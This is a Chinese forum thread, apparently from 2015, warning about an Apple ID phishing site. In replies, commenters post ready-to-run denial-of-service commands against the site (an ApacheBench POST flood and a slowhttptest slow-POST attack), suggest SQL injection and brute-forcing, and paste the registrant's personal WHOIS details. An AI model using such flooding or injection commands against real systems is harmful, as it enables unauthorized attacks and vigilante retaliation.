这是一个创建于 3374 天前的主题,其中的信息可能已经有所发展或是发生改变。
切勿登录
www.id-appleid-apple.com
简单查了下 whois 信息,以下域名都应该是同一站点。
find.appidlacksye.com
activationicloudid.com
appidlacksye.com
www.id-appleid-apple.com
简单查了下 whois 信息,以下域名都应该是同一站点。
find.appidlacksye.com
activationicloudid.com
appidlacksye.com
 |
1
aheadlead 2015-02-04 22:12:38 +08:00
有谁有兴趣去sqlmap一下吗..
|
 |
2
DT27 2015-02-04 22:41:34 +08:00
已举报到360,其他平台要举报太麻烦了。。。
|
 |
3
xiaozhizhu1997 2015-02-04 23:00:22 +08:00 via Android
查IP看看能不能投诉到机房…
|
 |
4
aaronlam 2015-02-04 23:00:41 +08:00
这域名也是醉了,看到页面后更醉!
|
 |
5
wdlth 2015-02-04 23:02:04 +08:00
我只能说非Verisign EV SSL请勿钓鱼
|
 |
6
nobita 2015-02-04 23:17:07 +08:00
safari已经有了警告
|
 |
7
creamiced 2015-02-04 23:40:05 +08:00
那个确认按钮忘记修边了啊
|
 |
8
rainy3636 2015-02-05 00:35:09 +08:00
chrome也已有警告
|
|
9
rainy3636 2015-02-05 00:37:35 +08:00
写了个假id假密码,提示错误后给我跳到了真icloud…
|
 |
10
quake0day 2015-02-05 00:51:50 +08:00
@rainy3636 你可以写一些骂人的话,或者不停的post垃圾上去,反正这些都会被记录到数据库,可以显著增加他们查对正确账号的时间成本。另外可以试试sql注入。
|
 |
11
lisonfan 2015-02-05 03:01:04 +08:00  2
 |
 |
12
canky 2015-02-05 03:20:16 +08:00 via iPhone
我觉得开burp suite爆破模式提交一些垃圾不错
|
 |
13
futursolo 2015-02-05 07:00:48 +08:00
这破网站居然还有移动版。。。
|
 |
14
msg7086 2015-02-05 07:19:42 +08:00 2
echo '[email protected]&sjpass=test' > p
ab -n 100000 -c 1000 -p p -T 'application/x-www-form-urlencoded' http://www.id-appleid-apple.com/Save.asp 默默地按下回车 |
 |
15
lovelinghan 2015-02-05 08:46:25 +08:00 via Android
@msg7086 这个好
|
 |
16
m939594960 2015-02-05 09:04:56 +08:00
@msg7086 DELETE FROM user WHERE sjname='[email protected]'
|
 |
17
shippo7 2015-02-05 09:05:18 +08:00 via iPhone
写脚本疯狂提交垃圾数据
|
 |
18
dotpig 2015-02-05 09:07:08 +08:00
Chrome 大红色的钓鱼诱骗提醒,还是蛮喜庆的。
|
 |
19
DearTanker 2015-02-05 09:12:28 +08:00
已经蹦了,你们好厉害啊。
|
 |
20
TangMonk 2015-02-05 09:12:36 +08:00
@msg7086 酷炫,又学到一招
但是为啥显示: Benchmarking www.id-appleid-apple.com (be patient) apr_socket_recv: Connection reset by peer (54) |
 |
21
vvard3n 2015-02-05 09:22:03 +08:00
来个py脚本吧?
|
 |
22
tmqhliu 2015-02-05 09:26:07 +08:00
这都是骗子用来给被盗的 Apple 手机钓鱼的,目的就是骗得机主的 Apple ID 和密码,以及密保信息。这种网站成本很低,做一个就转移了,很难打击。只能自己多多留心了
|
 |
23
carvizerw 2015-02-05 11:08:06 +08:00
不知道这哥们是不是用真实信息注册的域名
Registrant Name: he yaolong Registrant Organization: he yaolong Registrant Street: yexianbaoanzhenliwuzhuangwuzu Registrant City: pingdingshan Registrant State/Province: Henan Registrant Postal Code: 467200 Registrant Country: CN Registrant Phone : +86.03756173999 Registrant Phone Ext: Registrant Fax: +86.03756173999 |
|
24
DT27 2015-02-05 11:17:28 +08:00
哈哈,站长受不了了,域名都跳到百度了。。。
|
|
25
msg7086 2015-02-05 12:23:10 +08:00 1
@m939594960 只是举个栗子罢了。请自行上伪真实数据。
再给你们一个玩法。 sudo aptitude install slowhttptest -y slowhttptest -c 5000 -t POST -u http://www.id-appleid-apple.com/Save.asp -l 3600 OPENVZ慎用。请仅用于打击恶势力。 |
 |
26
laukwanchan 2015-02-05 12:48:41 +08:00
你们都把他们玩坏了好么
|
 |
27
dndx 2015-02-05 12:51:36 +08:00
|
 |
28
nyanyh 2015-02-05 20:47:02 +08:00
系統提示:參數錯誤或被Syn攻擊,請檢查!
233333 |
Select Language